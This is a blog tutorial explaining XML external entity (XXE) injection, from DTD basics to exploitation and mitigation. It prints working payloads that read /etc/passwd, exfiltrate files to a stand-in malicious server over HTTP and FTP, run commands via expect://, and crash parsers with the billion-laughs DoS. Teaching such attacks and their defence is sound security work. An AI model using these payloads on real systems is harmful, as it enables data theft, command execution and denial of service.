XXE explained – OWASP Top 10 vulnerabilities

April 22, 2021 by thehackerish

Welcome to this new episode of the OWASP Top 10 vulnerabilities series. Today, you will learn everything related to XXE. This blog post will explain the theory with some examples. By the end, you will be ready to tackle XXE in practice.

Don’t forget to subscribe the Friday newsletter to kickstart your

Some key XXE basic concepts

Before understanding XXE, you need to know some key concepts which will help you properly understand the XXE attack. If you already know what is XML, DTD, XML Entities, parameter entities and XML parsers, feel free to skip this section.

What is XML?

XML stands for Extensible Markup Language. It defines how a document should be structured for data exchange. The following is an example XML document.

<account>
<name>Bob</name>
<email>bob@thehackerish.com</email>
<age>30</age>
<bio>I love cats</bio>
</account>

XML is used to exchange data between systems. For example, when you subscribe to an RSS feed, your client software consumes XML documents containing the News and displays them in a feed. Another example is SOAP, which uses XML to exchange data in web services.

XML Parsers

For an application to manipulate XML documents, it uses an XML parser, which converts the text representation, sent over the network, into an XML DOM (Document Object Model) ready to be consumed by the application.

What is a DTD?

Sometimes, when exchanging XML documents, developers need to enforce the data elements, attributes and value types, etc. This can be done using a document type definition (DTD). This will come handy when exploiting XXE. For example, the XML document mentioned above can optionally include a DTD as follows:

<?xml version="1.0"?>
<!DOCTYPE account [
<!ELEMENT account (name,email,age,bio)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT email (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT bio (#PCDATA)>
]>
<account>
<name>Bob</name>
<email>bob@thehackerish.com</email>
<age>30</age>
<bio>I love cats</bio>
</account>

In this DTD, we enforce that the XML document should contain an account element, which includes a name, email, age and bio fields of type string. Since this DTD is included within the XML document itself, it is called an internal DTD. XML supports also external DTDs, or both.

What is an XML Entity?

XML Entities provide a way to represent data within an XML document. Think of it as a variable holding your data, which you can reference in many places. They are defined inside a DTD. The syntax is as follows:

<!ENTITY entity-name "entity-value">

When you want to reference data from other resources, or include entities from an external DTD, you use XML External Entities. The syntax is slightly different.

<!ENTITY entity-name SYSTEM "/uri/to/the/dtd/or/resource">

Then, you use the syntax &entity-name; to include your entity inside the XML document.

What is an XML Parameter Entity?

Sometimes, XML external entities cannot be used for reasons we will explore shortly. In this case, you can use Parameter Entities. They are special entities which can be referenced inside a DTD. The syntax is:

<!ENTITY % param-entity-name "param-entity-value" >

You can also use parameter entities to fetch a URI

<!ENTITY % param-entity-name SYSTEM "URI" >

What is XXE injection vulnerability?

Now that you know what does XXE mean, how can we use it to achieve an injection?

Do you remember, from the Injection vulnerability, when we explained why trusted user input is dangerous? Well, XML injection is no different. In fact, XXE injection happens when an application trusts user input in an XML document. This is a typical scenario of the attack:

A feature in the application expects an XML to carry comments. The XML document looks like this:

<?xml version = "1.0" encoding = "UTF-8" ?>
   <comment>
      <user>eve</user>
      <content>Great article!</content>
   </comment>

Sometimes, even if the application accepts JSON data, you can still try changing the Content-Type HTTP Header from application/json to application/xml. See this in our XXE tutorial. For now, let’s suppose that the application expects XML.

A malicious user sends the following XML input

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY myentity SYSTEM "file:///etc/passwd"> ]>
<comment>
      <user>eve</user>
      <content>&myentity;</content>
   </comment>

The application parses the malicious input using the XML Parser.
The content of /etc/passwd gets stored as the comment of the user eve.
The application renders the list of comments, which discloses the server’s /etc/passwd file.
If we inject a non-existing file, say file:///etc/passwdnotexistent, the server returns an error stating that the file /etc/passwdnotexistent doesn’t exist.

In the scenario we’ve just described, the server returns direct feedback to the user. You can see this in action in this hands-on tutorial. However, it’s not always the case. XXE injections, like any Injection vulnerability, can also be blind.

What is Blind XXE?

When the server doesn’t return direct feedback to the user upon an XML injection, we call it a blind XXE vulnerability. You may wonder how we would exploit it if there is no feedback? Well, the same concept we learned in the Injection vulnerability can be applied here: Abusing the interpreter to make a call to us.

In the following section, we will explore the different ways we can use to exploit a blind XXE.

How to detect a Blind XXE vulnerability?

The easiest way to detect a Blind XXE is to use a URL pointing to our server in the XML external entity. You can inject the following DTD file and wait for a ping on your malicious server:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://malicious-server.com/poc"> ]>

If HTTP traffic is allowed, the vulnerable server will request http://malicious-server.com/poc, which you can see in your malicious server’s logs. See this in action on this hands-on XXE tutorial.

Note: Sometimes, even if there is a Blind XXE vulnerability and the HTTP traffic is allowed outbound, you will not receive a ping from the vulnerable server. In this case, you can use parameter entities instead of external entities. You might get lucky if XML external entities are blocked. This is especially useful when you don’t have an XML field to inject into.

How to exploit a Blind XXE?

Once you validate it, you can start testing for the XXE vulnerability. There are many scenarios, depending on the situation, but they all fall into the out-of-band category.

Exfiltrate internal files using out-of-band HTTP callbacks

Blind XXE vulnerability allows you to read internal files on the remote vulnerable host. To do that, you send a malicious XML document containing the following DTD:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://malicious-server/malicious.dtd"> %xxe;]>
Before that, you should have the following malicious.dtd file on your malicious-server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % bar "<!ENTITY &#x25; out SYSTEM 'http://malicious-server/?content=%file;'>">
%bar;
%out;

Notice that we are defining the entity out inside the entity bar. This is possible because you can use nested entities in external DTDs, which is useful when you don’t have an XML field to reference your external entity within.

This is how the XXE attack workflow will go:

The vulnerable server will receive your malicious XML document and evaluate it using the XML parser.
The XML parser will fetch your malicious DTD file from your malicious server.
The vulnerable server will fetch the content of its /etc/passwd file and put it as the value of the parameter content.
The vulnerable server will send a request to your malicious server
You will get the content of the vulnerable server’s /etc/passwd file in the content parameter.

Note: Sometimes, you can’t retrieve multi-line files because it doesn’t result in a valid URL. Therefore, you can use an FTP server to receive incoming requests.

Exfiltrate internal files using a malicious FTP server

Exploiting a Blind XXE using FTP involves setting up an FTP server and pointing to it inside your malicious dtd file, which will look like this:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % bar "<!ENTITY &#x25; out SYSTEM ftp://malicious-ftp-server/%file;'>">
%bar;
%out;

Note that the only difference is that you use ftp:// instead of http://

You can easily set up an FTP server using xxeserv. If you don’t have a publicly accessible server, you can use ngrok to expose a local VM to the internet.

Exploit Blind XXE without an external DTD

All the scenarios we described so far require you to host a malicious DTD file on your server. However, what to do if there is a firewall denying all egress traffic?

In his write up, Arseniy Sharoglazov introduced a new technique. Basically, the idea is to reuse an already existing DTD and redefine a parameter entity inside it. Why not just including the external DTD inside the internal one, you might ask? Well, in XML, you can’t use nested entities in internal DTDs.

Exploit XXE with SVG files

File uploads can be vulnerable to XXE if the application parses XML files. A typical file type which uses XML is SVG. You can upload the following SVG profile picture to achieve XXE.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg height="30" width="200">
  <text x="0" y="15" fill="red">&xxe;</text>
</svg>

Exploit XXE using docx and excel files

When an application allows you to upload office documents, like docx or excel files, the first thing you have to test is XXE injection attack. In fact, office documents are simply XML based files archived into one file. You should watch this awesome talk which details how to exploit XXE using file uploads. The speaker, Willis Vandevanter, also released the oxml_xxe tool to help security researchers and ethical hackers test for XXE using file uploads for many file types.

XXE impact

You can do more than just exfiltrating internal files. Depending on the context, an XXE vulnerability can lead to many outcomes.

XXE to SSRF

Because you can specify URIs in the XML entity, you can use the XXE vulnerability to reach internal assets. For example, before the introduction of IMDSv2, an attacker could easily retrieve Amazon EC2 instance metadata containing sensitive data.

XXE to RCE

In PHP applications, you can use the expect:// wrapper to run arbitrary commands on the server. For example, in the case of an error-based XXE, you can use the following DTD to run the id command on the vulnerable server:

<!DOCTYPE foo [<!ENTITY myentity SYSTEM "expect://id"> ]>

Then, reference myentity in your XML field.

There are some limitations when it comes to running arbitrary commands because the XML parser evaluates the URI you are using and finds that is is invalid, but you can always find a way to bypass them. Besides, if you can chain an SSRF to an XXE, you can use the Gopher protocol to achieve a Remote Code Execution. This awesome article will give you many tips on how to escalate your XXE to RCE.

XXE to DoS

Sometimes, the server blocks external and parameter entities. Therefore, you can’t read internal files, or perform SSRF, etc. However, you can achieve a Denial Of Service. In fact, you can leverage XML entities to push the parser to load a large number of entities. The following DTD leads to the billion laughs attack using XXE. In fact, it will load a billion times the word laugh, causing a Denial Of Service.

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "laugh">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XXE injection attacks in the real-world

There are so many real-world XXE injection attacks. However, I will list three here.

Firstly, in this advisory, Aon’s Cyber Solutions discovered an XXE vulnerability which allowed accessing internal files due to a misconfiguration in RealObjects PDFreactior before 10.1.10722.

Then, in this report, the bug bounty hunter demonstrates a Denial of Service condition due to an XML injection using the billion laughs attack.

Finally, this report shows how the bug bounty hunter exploited an Error-Based XXE to retrieve the /etc/passwd file.

How to mitigate XXE?

If you’ve been reading from the beginning, you should come up with defense methods against XML injection on your own. Since XXE injection vulnerability relies on DTDs, the best thing you can do to achieve a proper XML injection remediation is to disable DTDs altogether. However, this is not always possible because the application needs to use DTDs. In this case, disable external DTDs and XML External Entities. The following OWASP XXE prevention Cheat Sheet gives you all the details you need to prevent XXE on XML parsers for many programming languages.

That’s it! I hope you enjoyed learning XXE. Now, you can practice what you’ve learned in this hands-on XXE tutorial. And don’t forget to subscribe to the Friday newsletter below to receive updates about new content.